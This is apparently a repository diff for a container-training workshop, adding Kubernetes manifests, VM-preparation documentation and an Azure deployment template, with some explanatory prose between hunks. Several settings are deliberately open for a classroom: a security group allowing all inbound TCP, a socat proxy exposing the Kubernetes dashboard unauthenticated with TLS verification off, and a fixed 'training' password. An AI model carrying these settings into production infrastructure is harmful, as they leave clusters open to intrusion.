  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  volumes:
  - configMap
  - emptyDir
  - projected
  - secret
  - downwardAPI
  - persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:restricted
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['restricted']
k8s/registry.yaml (new file, 15 lines)
@@ -0,0 +1,15 @@
apiVersion: v1
kind: Pod
metadata:
  name: registry
spec:
  containers:
  - name: registry
    image: registry
    env:
    - name: REGISTRY_HTTP_ADDR
      valueFrom:
        configMapKeyRef:
          name: registry
          key: http.addr
k8s/socat.yaml (new file, 67 lines)
@@ -0,0 +1,67 @@
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  annotations:
    deployment.kubernetes.io/revision: "2"
  creationTimestamp: null
  generation: 1
  labels:
    app: socat
  name: socat
  namespace: kube-system
  selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
spec:
  replicas: 1
  selector:
    matchLabels:
      app: socat
  strategy:
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 1
    type: RollingUpdate
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: socat
    spec:
      containers:
      - args:
        - sh
        - -c
        - apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard:443,verify=0
        image: alpine
        imagePullPolicy: Always
        name: socat
        resources: {}
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      terminationGracePeriodSeconds: 30
status: {}
---
apiVersion: v1
kind: Service
metadata:
  creationTimestamp: null
  labels:
    app: socat
  name: socat
  namespace: kube-system
  selfLink: /api/v1/namespaces/kube-system/services/socat
spec:
  externalTrafficPolicy: Cluster
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: socat
  sessionAffinity: None
  type: NodePort
status:
  loadBalancer: {}
k8s/storage-class.yaml (new file, 11 lines)
@@ -0,0 +1,11 @@
kind: StorageClass
apiVersion: storage.k8s.io/v1beta1
metadata:
  name: portworx-replicated
  annotations:
    storageclass.kubernetes.io/is-default-class: "true"
provisioner: kubernetes.io/portworx-volume
parameters:
  repl: "2"
  priority_io: "high"
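Since this StorageClass carries the `is-default-class` annotation, a PersistentVolumeClaim that does not specify any `storageClassName` will be provisioned by Portworx with two replicas. You can confirm which class is the default with:

```bash
kubectl get storageclass
# The "(default)" marker should appear next to portworx-replicated.
```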
k8s/traefik.yaml (new file, 103 lines)
@@ -0,0 +1,103 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: traefik-ingress-controller
  namespace: kube-system
---
kind: DaemonSet
apiVersion: apps/v1
metadata:
  name: traefik-ingress-controller
  namespace: kube-system
  labels:
    k8s-app: traefik-ingress-lb
spec:
  selector:
    matchLabels:
      k8s-app: traefik-ingress-lb
  template:
    metadata:
      labels:
        k8s-app: traefik-ingress-lb
      name: traefik-ingress-lb
    spec:
      tolerations:
      - effect: NoSchedule
        operator: Exists
      hostNetwork: true
      serviceAccountName: traefik-ingress-controller
      terminationGracePeriodSeconds: 60
      containers:
      - image: traefik:1.7
        name: traefik-ingress-lb
        ports:
        - name: http
          containerPort: 80
          hostPort: 80
        - name: admin
          containerPort: 8080
          hostPort: 8080
        securityContext:
          capabilities:
            drop:
            - ALL
            add:
            - NET_BIND_SERVICE
        args:
        - --api
        - --kubernetes
        - --logLevel=INFO
---
kind: Service
apiVersion: v1
metadata:
  name: traefik-ingress-service
  namespace: kube-system
spec:
  selector:
    k8s-app: traefik-ingress-lb
  ports:
  - protocol: TCP
    port: 80
    name: web
  - protocol: TCP
    port: 8080
    name: admin
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: traefik-ingress-controller
rules:
- apiGroups:
  - ""
  resources:
  - services
  - endpoints
  - secrets
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - extensions
  resources:
  - ingresses
  verbs:
  - get
  - list
  - watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: traefik-ingress-controller
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
  name: traefik-ingress-controller
  namespace: kube-system
k8s/users:jean.doe.yaml (new file, 33 lines)
@@ -0,0 +1,33 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: jean.doe
  namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
  resources: [ certificatesigningrequests ]
  verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
  resourceNames: [ users:jean.doe ]
  resources: [ certificatesigningrequests ]
  verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: users:jean.doe
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: users:jean.doe
subjects:
- kind: ServiceAccount
  name: jean.doe
  namespace: users
k8s/volumes-for-consul.yaml (new file, 70 lines)
@@ -0,0 +1,70 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node2
  annotations:
    node: node2
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node3
  annotations:
    node: node3
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node4
  annotations:
    node: node4
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node4
@@ -1,5 +1,5 @@
[build]
-base = "docs"
-publish = "docs"
+base = "slides"
+publish = "slides"
command = "./build.sh once"
@@ -7,9 +7,9 @@ workshop.

## 1. Prerequisites

Virtualbox, Vagrant and Ansible

- Virtualbox: https://www.virtualbox.org/wiki/Downloads

- Vagrant: https://www.vagrantup.com/downloads.html
@@ -25,19 +25,20 @@ Virtualbox, Vagrant and Ansible

        $ git clone --recursive https://github.com/ansible/ansible.git
        $ cd ansible
-        $ git checkout stable-2.0.0.1
+        $ git checkout stable-{{ getStableVersionFromAnsibleProject }}
        $ git submodule update

- source the setup script to make Ansible available on this terminal session:

        $ source path/to/your-ansible-clone/hacking/env-setup

-- you need to repeat the last step everytime you open a new terminal session
+- you need to repeat the last step every time you open a new terminal session
  and want to use any Ansible command (but you'll probably only need to run
  it once).


## 2. Preparing the environment

+Change into the directory that has your Vagrantfile.

Run the following commands:

@@ -66,6 +67,14 @@ will reflect inside the instance.

- Depending on the Vagrant version, `sudo apt-get install bsdtar` may be needed

+- If you get an error like "no Vagrant file found", or you have a file but "cannot open base box" when running `vagrant up`,
+  chances are good you are not in the correct directory.
+  Make sure you are in the subdirectory named "prepare-local". It has all the config files required by Ansible, Vagrant, and VirtualBox.

+- If you are using Python 3.7 and, when running the ansible-playbook provisioning, you see an error like "SyntaxError: invalid syntax"
+  mentioning the word "async", you need to upgrade your Ansible version to 2.6 or higher to resolve the keyword conflict.
+  https://github.com/ansible/ansible/issues/42105

- If you get strange Ansible errors about dependencies, try to check your pip
  version with `pip --version`. The current version is 8.1.1. If your pip is
  older than this, upgrade it with `sudo pip install --upgrade pip`, restart
@@ -1,26 +1,53 @@
-# Trainer tools to create and prepare VMs for Docker workshops on AWS
+# Trainer tools to create and prepare VMs for Docker workshops

These tools can help you to create VMs on:

- Azure
- EC2
- OpenStack

## Prerequisites

- [Docker](https://docs.docker.com/engine/installation/)
- [Docker Compose](https://docs.docker.com/compose/install/)
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`)

Depending on the infrastructure that you want to use, you also need to install
the Azure CLI, the AWS CLI, or Terraform (for OpenStack deployment).

And if you want to generate printable cards:

- [pyyaml](https://pypi.python.org/pypi/PyYAML)
- [jinja2](https://pypi.python.org/pypi/Jinja2)

You can install them with pip (perhaps with `pip install --user`, or even use `virtualenv` if that's your thing).

These require Python 3. If you are on a Mac, see below for specific instructions on setting up
Python 3 to be the default Python on a Mac. In particular, if you installed `mosh`, Homebrew
may have changed your default Python to Python 2.

## General Workflow

- fork/clone the repo
- create an infrastructure configuration in the `prepare-vms/infra` directory
  (using one of the example files in that directory)
- create your own settings file from `settings/example.yaml`
-- run `./workshopctl` commands to create instances, install docker, setup each users environment in node1, other management tasks
-- run `./workshopctl cards` command to generate PDF for printing handouts of each users host IP's and login info
+- if necessary, increase allowed open files: `ulimit -Sn 10000`
+- run `./workshopctl start` to create instances
+- run `./workshopctl deploy` to install Docker and set up the environment
+- run `./workshopctl kube` (if you want to install and set up Kubernetes)
+- run `./workshopctl cards` (if you want to generate a PDF with printable handouts of each user's host IPs and login info)
+- run `./workshopctl stop` at the end of the workshop to terminate instances

## Clone/Fork the Repo, and Build the Tools Image

The Docker Compose file here is used to build an image with all the dependencies to run the `./workshopctl` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](workshopctl#L5).

-    $ git clone https://github.com/jpetazzo/orchestration-workshop.git
-    $ cd orchestration-workshop/prepare-vms
+    $ git clone https://github.com/jpetazzo/container.training
+    $ cd container.training/prepare-vms
     $ docker-compose build


## Preparing to Run `./workshopctl`

### Required AWS Permissions/Info
@@ -29,40 +56,74 @@ The Docker Compose file here is used to build an image with all the dependencies

- Using a non-default VPC or Security Group isn't supported out of the box yet, so you will have to customize `lib/commands.sh` if you want to change that.
- These instances will use the default VPC Security Group, which does not open any ports from the Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./workshopctl opensg`, which opens up all ports.

-### Required Environment Variables
+### Create your `infra` file

-- `AWS_ACCESS_KEY_ID`
-- `AWS_SECRET_ACCESS_KEY`
-- `AWS_DEFAULT_REGION`
+You need to do this only once. (On AWS, you can create one `infra`
+file per region.)

-### Update/copy `settings/example.yaml`
+Make a copy of one of the example files in the `infra` directory.

-Then pass `settings/YOUR_WORKSHOP_NAME-settings.yaml` as an argument to `./workshopctl deploy`, `./workshopctl cards`, etc.
+For instance:

-    ./workshopctl cards 2016-09-28-00-33-bret settings/orchestration.yaml
+```bash
+cp infra/example.aws infra/aws-us-west-2
+```

+Edit your infrastructure file to customize it.
+You will probably need to put your cloud provider credentials,
+select region...

+If you don't have the `aws` CLI installed, you will get a warning that it's a missing dependency. If you're not using AWS you can ignore this.

+### Create your `settings` file

+Similarly, pick one of the files in `settings` and copy it
+to customize it.

+For instance:

+```bash
+cp settings/example.yaml settings/myworkshop.yaml
+```

+You're all set!

## `./workshopctl` Usage

```
workshopctl - the orchestration workshop swiss army knife
Commands:
-ami                Show the AMI that will be used for deployment
-amis               List Ubuntu AMIs in the current region
-cards              Generate ready-to-print cards for a batch of VMs
-deploy             Install Docker on a bunch of running VMs
-ec2quotas          Check our EC2 quotas (max instances)
-help               Show available commands
-ids                List the instance IDs belonging to a given tag or token
-ips                List the IP addresses of the VMs for a given tag or token
-kube               Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
-list               List available batches in the current region
-opensg             Open the default security group to ALL ingress traffic
-pull_images        Pre-pull a bunch of Docker images
-retag              Apply a new tag to a batch of VMs
-start              Start a batch of VMs
-status             List instance status for a given batch
-stop               Stop (terminate, shutdown, kill, remove, destroy...) instances
-test               Run tests (pre-flight checks) on a batch of VMs
+build              Build the Docker image to run this program in a container
+cards              Generate ready-to-print cards for a group of VMs
+deploy             Install Docker on a bunch of running VMs
+disableaddrchecks  Disable source/destination IP address checks
+disabledocker      Stop Docker Engine and don't restart it automatically
+helmprom           Install Helm and Prometheus
+help               Show available commands
+ids                (FIXME) List the instance IDs belonging to a given tag or token
+kubebins           Install Kubernetes and CNI binaries but don't start anything
+kubereset          Wipe out Kubernetes configuration on all nodes
+kube               Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
+kubetest           Check that all nodes are reporting as Ready
+listall            List VMs running on all configured infrastructures
+list               List available groups for a given infrastructure
+netfix             Disable GRO and run a pinger job on the VMs
+opensg             Open the default security group to ALL ingress traffic
+ping               Ping VMs in a given tag, to check that they have network access
+pssh               Run an arbitrary command on all nodes
+pull_images        Pre-pull a bunch of Docker images
+quotas             Check our infrastructure quotas (max instances)
+remap_nodeports    Remap NodePort range to 10000-10999
+retag              (FIXME) Apply a new tag to a group of VMs
+ssh                Open an SSH session to the first node of a tag
+start              Start a group of VMs
+stop               Stop (terminate, shutdown, kill, remove, destroy...) instances
+tags               List groups of VMs known locally
+test               Run tests (pre-flight checks) on a group of VMs
+weavetest          Check that weave seems properly setup
+webssh             Install a WEB SSH server on the machines (port 1080)
+wrap               Run this program in a container
+www                Run a web server to access card HTML and PDF
```

### Summary of What `./workshopctl` Does For You
@@ -73,35 +134,78 @@ test               Run tests (pre-flight checks) on a batch of VMs

- The `./workshopctl` script can be executed directly.
- It will run locally if all its dependencies are fulfilled; otherwise it will run in the Docker container you created with `docker-compose build` (preparevms_prepare-vms).
- During `start` it will add your default local SSH key to all instances under the `ubuntu` user.
-- During `deploy` it will create the `docker` user with password `training`, which is printing on the cards for students. For now, this is hard coded.
+- During `deploy` it will create the `docker` user with password `training`, which is printed on the cards for students. This can be configured with the `docker_user_password` property in the settings file.

-### Example Steps to Launch a Batch of Instances for a Workshop
+### Example Steps to Launch a Group of AWS Instances for a Workshop

-- Run `./workshopctl start N` to create `N` EC2 instances
+- Run `./workshopctl start --infra infra/aws-us-east-2 --settings settings/myworkshop.yaml --count 60` to create 60 EC2 instances
  - Your local SSH key will be synced to instances under the `ubuntu` user
  - AWS instances will be created and tagged based on date, and IPs stored in `prepare-vms/tags/`
-- Run `./workshopctl deploy TAG settings/somefile.yaml` to run `scripts/postprep.rc` via parallel-ssh
+- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
  - If it errors or times out, you should be able to rerun
  - Requires a good connection to run all the parallel SSH connections, up to 100 in parallel (ProTip: create a dedicated management instance in the same AWS region where you run all these utils from)
-- Run `./workshopctl pull-images TAG` to pre-pull a bunch of Docker images to the instances
-- Run `./workshopctl cards TAG settings/somefile.yaml` to generate PDF/HTML files to print and cut and hand out to students
+- Run `./workshopctl pull_images TAG` to pre-pull a bunch of Docker images to the instances
+- Run `./workshopctl cards TAG` to generate PDF/HTML files to print and cut and hand out to students
- *Have a great workshop*
- Run `./workshopctl stop TAG` to terminate instances.

-## Other Tools
+### Example Steps to Launch Azure Instances

-### Deploying your SSH key to all the machines
+- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account (`az login`)
+- Customize `azuredeploy.parameters.json`
+  - Required:
+    - Provide the SSH public key you plan to use for instance configuration
+  - Optional:
+    - Choose a name for the workshop (default is "workshop")
+    - Choose the number of instances (default is 3)
+    - Customize the desired instance size (default is Standard_D1_v2)
+- Launch instances with your chosen resource group name and your preferred region; the examples are "workshop" and "eastus":

+```
+az group create --name workshop --location eastus
+az group deployment create --resource-group workshop --template-file azuredeploy.json --parameters @azuredeploy.parameters.json
+```

-- Make sure that you have SSH keys loaded (`ssh-add -l`).
-- Source `rc`.
-- Run `pcopykey`.
+The `az group deployment create` command can take several minutes and will only say `- Running ..` until it completes, unless you increase the verbosity with `--verbose` or `--debug`.

+To display the IPs of the instances you've launched:

-### Installing extra packages
+```
+az vm list-ip-addresses --resource-group workshop --output table
+```

-- Source `postprep.rc`.
-  (This will install a few extra packages, add entries to
-  /etc/hosts, generate SSH keys, and deploy them on all hosts.)
+If you want to put the IPs into `prepare-vms/tags/<tag>/ips.txt` for a tag of "myworkshop":

+1) If you haven't yet installed `jq` and/or created your event's tags directory in `prepare-vms`:

+```
+brew install jq
+mkdir -p tags/myworkshop
+```

+2) And then generate the IP list:

+```
+az vm list-ip-addresses --resource-group workshop --output json | jq -r '.[].virtualMachine.network.publicIpAddresses[].ipAddress' > tags/myworkshop/ips.txt
+```

+After the workshop is over, remove the instances:

+```
+az group delete --resource-group workshop
+```

+### Example Steps to Configure Instances from a non-AWS Source

+- Copy `infra/example.generic` to `infra/generic`
+- Run `./workshopctl start --infra infra/generic --settings settings/...yaml`
+- Note the `prepare-vms/tags/TAG/` path that has been auto-created.
+- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
+- Edit the file `prepare-vms/tags/TAG/ips.txt`; it should list the IP addresses of the VMs (one per line, without any comments or other info)
+- Continue deployment of the cluster configuration with `./workshopctl deploy TAG`
+- Optionally, configure Kubernetes clusters of the size in the settings: `workshopctl kube TAG`
+- Optionally, test your Kubernetes clusters (they may take a little time to become ready): `workshopctl kubetest TAG`
+- Generate cards to print and hand out: `workshopctl cards TAG`
+- Print the cards file: `prepare-vms/tags/TAG/ips.html`


## Even More Details
@@ -114,7 +218,7 @@ To see which local key will be uploaded, run `ssh-add -l | grep RSA`.

#### Instance + tag creation

-10 VMs will be started, with an automatically generated tag (timestamp + your username).
+The VMs will be started, with an automatically generated tag (timestamp + your username).

Your SSH key will be added to the `authorized_keys` of the ubuntu user.

@@ -122,35 +226,33 @@ Your SSH key will be added to the `authorized_keys` of the ubuntu user.

Following the creation of the VMs, a text file will be created containing a list of their IPs.

This ips.txt file will be created in the $TAG/ directory and a symlink will be placed in the working directory of the script.

If you create new VMs, the symlinked file will be overwritten.

#### Deployment

Instances can be deployed manually using the `deploy` command:

-    $ ./workshopctl deploy TAG settings/somefile.yaml
+    $ ./workshopctl deploy TAG

-The `postprep.rc` file will be copied via parallel-ssh to all of the VMs and executed.
+The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.

#### Pre-pull images

-    $ ./workshopctl pull-images TAG
+    $ ./workshopctl pull_images TAG

#### Generate cards

-    $ ./workshopctl cards TAG settings/somefile.yaml
+    $ ./workshopctl cards TAG

If you want to generate both HTML and PDF cards, install [wkhtmltopdf](https://wkhtmltopdf.org/downloads.html); without that installed, only HTML cards will be generated.

If you don't have `wkhtmltopdf` installed, you will get a warning that it is a missing dependency. If you plan to just print the HTML cards, you can ignore this.

#### List tags

-    $ ./workshopctl list
+    $ ./workshopctl list infra/some-infra-file

#### List VMs

+    $ ./workshopctl listall

-    $ ./workshopctl list TAG

-This will print a human-friendly list containing some information about each instance.
+    $ ./workshopctl tags

#### Stop and destroy VMs
@@ -160,3 +262,32 @@ This will print a human-friendly list containing some information about each instance.

- Don't write to bash history in system() in postprep
- compose, etc version inconsistent (int vs str)

+## Making sure Python3 is the default (Mac only)

+Check the `/usr/local/bin/python` symlink. It should be pointing to
+`/usr/local/Cellar/python/3`-something. If it isn't, follow these
+instructions.

+1) Verify that Python 3 is installed.

+```
+ls -la /usr/local/Cellar/Python
+```

+You should see one or more versions of Python 3. If you don't,
+install it with `brew install python`.

+2) Verify that `python` points to Python 3.

+```
+ls -la /usr/local/bin/python
+```

+If this points to `/usr/local/Cellar/python@2`, then we'll need to change it.

+```
+rm /usr/local/bin/python
+ln -s /usr/local/Cellar/Python/xxxx /usr/local/bin/python
+# where xxxx is the most recent Python 3 version you saw above
+```
250
prepare-vms/azuredeploy.json
Normal file
250
prepare-vms/azuredeploy.json
Normal file
@@ -0,0 +1,250 @@
{
  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "workshopName": {
      "type": "string",
      "defaultValue": "workshop",
      "metadata": {
        "description": "Workshop name."
      }
    },
    "vmPrefix": {
      "type": "string",
      "defaultValue": "node",
      "metadata": {
        "description": "Prefix for VM names."
      }
    },
    "numberOfInstances": {
      "type": "int",
      "defaultValue": 3,
      "metadata": {
        "description": "Number of VMs to create."
      }
    },
    "adminUsername": {
      "type": "string",
      "defaultValue": "ubuntu",
      "metadata": {
        "description": "Admin username for the VMs."
      }
    },
    "sshKeyData": {
      "type": "string",
      "defaultValue": "",
      "metadata": {
        "description": "SSH RSA public key, as a string."
      }
    },
    "imagePublisher": {
      "type": "string",
      "defaultValue": "Canonical",
      "metadata": {
        "description": "Name of the OS image publisher. The default is Canonical."
      }
    },
    "imageOffer": {
      "type": "string",
      "defaultValue": "UbuntuServer",
      "metadata": {
        "description": "Name of the image offer. The default is UbuntuServer."
      }
    },
    "imageSKU": {
      "type": "string",
      "defaultValue": "16.04-LTS",
      "metadata": {
        "description": "Version of the image. The default is 16.04-LTS."
      }
    },
    "vmSize": {
      "type": "string",
      "defaultValue": "Standard_D1_v2",
      "metadata": {
        "description": "VM size."
      }
    }
  },
  "variables": {
    "vnetID": "[resourceId('Microsoft.Network/virtualNetworks',variables('virtualNetworkName'))]",
    "subnet1Ref": "[concat(variables('vnetID'),'/subnets/',variables('subnet1Name'))]",
    "vmName": "[parameters('vmPrefix')]",
    "sshKeyPath": "[concat('/home/',parameters('adminUsername'),'/.ssh/authorized_keys')]",
    "publicIPAddressName": "PublicIP",
    "publicIPAddressType": "Dynamic",
    "virtualNetworkName": "MyVNET",
    "netSecurityGroup": "MyNSG",
    "addressPrefix": "10.0.0.0/16",
    "subnet1Name": "subnet-1",
    "subnet1Prefix": "10.0.0.0/24",
    "nicName": "myVMNic"
  },
  "resources": [
    {
      "apiVersion": "2017-11-01",
      "type": "Microsoft.Network/publicIPAddresses",
      "name": "[concat(variables('publicIPAddressName'),copyIndex(1))]",
      "location": "[resourceGroup().location]",
      "copy": {
        "name": "publicIPLoop",
        "count": "[parameters('numberOfInstances')]"
      },
      "properties": {
        "publicIPAllocationMethod": "[variables('publicIPAddressType')]"
      },
      "tags": {
        "workshop": "[parameters('workshopName')]"
      }
    },
    {
      "apiVersion": "2017-11-01",
      "type": "Microsoft.Network/virtualNetworks",
      "name": "[variables('virtualNetworkName')]",
      "location": "[resourceGroup().location]",
      "dependsOn": [
        "[concat('Microsoft.Network/networkSecurityGroups/', variables('netSecurityGroup'))]"
      ],
      "properties": {
        "addressSpace": {
          "addressPrefixes": [
            "[variables('addressPrefix')]"
          ]
        },
        "subnets": [
          {
            "name": "[variables('subnet1Name')]",
            "properties": {
              "addressPrefix": "[variables('subnet1Prefix')]",
              "networkSecurityGroup": {
                "id": "[resourceId('Microsoft.Network/networkSecurityGroups', variables('netSecurityGroup'))]"
              }
            }
          }
        ]
      },
      "tags": {
        "workshop": "[parameters('workshopName')]"
      }
    },
    {
      "apiVersion": "2017-11-01",
      "type": "Microsoft.Network/networkInterfaces",
      "name": "[concat(variables('nicName'),copyIndex(1))]",
      "location": "[resourceGroup().location]",
      "copy": {
        "name": "nicLoop",
        "count": "[parameters('numberOfInstances')]"
      },
      "dependsOn": [
        "[concat('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'),copyIndex(1))]",
        "[concat('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]"
      ],
      "properties": {
        "ipConfigurations": [
          {
            "name": "ipconfig1",
            "properties": {
              "privateIPAllocationMethod": "Dynamic",
              "publicIPAddress": {
                "id": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'), copyIndex(1)))]"
              },
              "subnet": {
                "id": "[variables('subnet1Ref')]"
              }
            }
          }
        ]
      },
      "tags": {
        "workshop": "[parameters('workshopName')]"
      }
    },
    {
      "apiVersion": "2017-12-01",
      "type": "Microsoft.Compute/virtualMachines",
      "name": "[concat(variables('vmName'),copyIndex(1))]",
      "location": "[resourceGroup().location]",
      "copy": {
        "name": "vmLoop",
        "count": "[parameters('numberOfInstances')]"
      },
      "dependsOn": [
        "[concat('Microsoft.Network/networkInterfaces/', variables('nicName'), copyIndex(1))]"
      ],
      "properties": {
        "hardwareProfile": {
          "vmSize": "[parameters('vmSize')]"
        },
        "osProfile": {
          "computerName": "[concat(variables('vmName'),copyIndex(1))]",
          "adminUsername": "[parameters('adminUsername')]",
          "linuxConfiguration": {
            "disablePasswordAuthentication": true,
            "ssh": {
              "publicKeys": [
                {
                  "path": "[variables('sshKeyPath')]",
                  "keyData": "[parameters('sshKeyData')]"
                }
              ]
            }
          }
        },
        "storageProfile": {
          "osDisk": {
            "createOption": "FromImage"
          },
          "imageReference": {
            "publisher": "[parameters('imagePublisher')]",
            "offer": "[parameters('imageOffer')]",
            "sku": "[parameters('imageSKU')]",
            "version": "latest"
          }
        },
        "networkProfile": {
          "networkInterfaces": [
            {
              "id": "[resourceId('Microsoft.Network/networkInterfaces', concat(variables('nicName'),copyIndex(1)))]"
            }
          ]
        }
      },
      "tags": {
        "workshop": "[parameters('workshopName')]"
      }
    },
    {
      "apiVersion": "2017-11-01",
      "type": "Microsoft.Network/networkSecurityGroups",
      "name": "[variables('netSecurityGroup')]",
      "location": "[resourceGroup().location]",
      "tags": {
        "workshop": "[parameters('workshopName')]"
      },
      "properties": {
        "securityRules": [
          {
            "name": "default-open-ports",
            "properties": {
              "protocol": "Tcp",
              "sourcePortRange": "*",
              "destinationPortRange": "*",
              "sourceAddressPrefix": "*",
              "destinationAddressPrefix": "*",
              "access": "Allow",
              "priority": 1000,
              "direction": "Inbound"
            }
          }
        ]
      }
    }
  ],
  "outputs": {
    "resourceID": {
      "type": "string",
      "value": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'),'1'))]"
    }
  }
}
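This template provisions one dynamic public IP, one NIC, and one Ubuntu VM per instance, plus a shared VNet and a wide-open NSG, all tagged with the workshop name. A deployment sketch with the Azure CLI of that era (the resource group name and location are placeholders, and the az invocation is an assumption, not something shown in this repo):

# Hypothetical deployment -- group name and region are placeholders.
az group create --name workshop-rg --location westeurope
az group deployment create \
    --resource-group workshop-rg \
    --template-file prepare-vms/azuredeploy.json \
    --parameters sshKeyData="$(cat ~/.ssh/id_rsa.pub)"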
18
prepare-vms/azuredeploy.parameters.json
Normal file
@@ -0,0 +1,18 @@
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "sshKeyData": {
      "value": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXTIl/M9oeSlcsC5Rfe+nZr4Jc4sl200pSw2lpdxlZ3xzeP15NgSSMJnigUrKUXHfqRQ+2wiPxEf0Odz2GdvmXvR0xodayoOQsO24AoERjeSBXCwqITsfp1bGKzMb30/3ojRBo6LBR6r1+lzJYnNCGkT+IQwLzRIpm0LCNz1j08PUI2aZ04+mcDANvHuN/hwi/THbLLp6SNWN43m9r02RcC6xlCNEhJi4wk4VzMzVbSv9RlLGST2ocbUHwmQ2k9OUmpzoOx73aQi9XNnEaFh2w/eIdXM75VtkT3mRryyykg9y0/hH8/MVmIuRIdzxHQqlm++DLXVH5Ctw6a4kS+ki7 workshop"
    },
    "workshopName": {
      "value": "workshop"
    },
    "numberOfInstances": {
      "value": 3
    },
    "vmSize": {
      "value": "Standard_D1_v2"
    }
  }
}
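The committed parameters file ships a sample public key, so anyone deploying should override sshKeyData with their own. If I read the CLI behavior correctly, --parameters may be repeated and later values take precedence, which gives a sketch like this (group name is again a placeholder):

# Hypothetical override -- repeated --parameters, later values win.
az group deployment create \
    --resource-group workshop-rg \
    --template-file prepare-vms/azuredeploy.json \
    --parameters @prepare-vms/azuredeploy.parameters.json \
    --parameters sshKeyData="$(cat ~/.ssh/id_rsa.pub)"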
@@ -1,80 +0,0 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker" -%}
{%- set pagesize = 15 -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set background_image = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "orchestration" -%}
{%- set pagesize = 12 -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set background_image = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body {
  margin: 0;
}

div {
  float: left;
  border: 1px dotted black;
  width: 27%;
  padding: 6% 2.5% 2.5% 2.5%;
  font-size: x-small;
  line-height: 1em;
  background-image: url("{{background_image}}");
  background-size: 13%;
  background-position-x: 50%;
  background-position-y: 5%;
  background-repeat: no-repeat;
}

p {
  margin: 0.5em 0 0.5em 0;
}

.pagebreak {
  page-break-after: always;
  clear: both;
  display: block;
  height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
  <p>
    Here is the connection information to your very own
    {{ cluster_or_machine }} for this {{ workshop_name }} workshop.
    You can connect to {{ this_or_each }} VM with any SSH client.
  </p>
  <p>
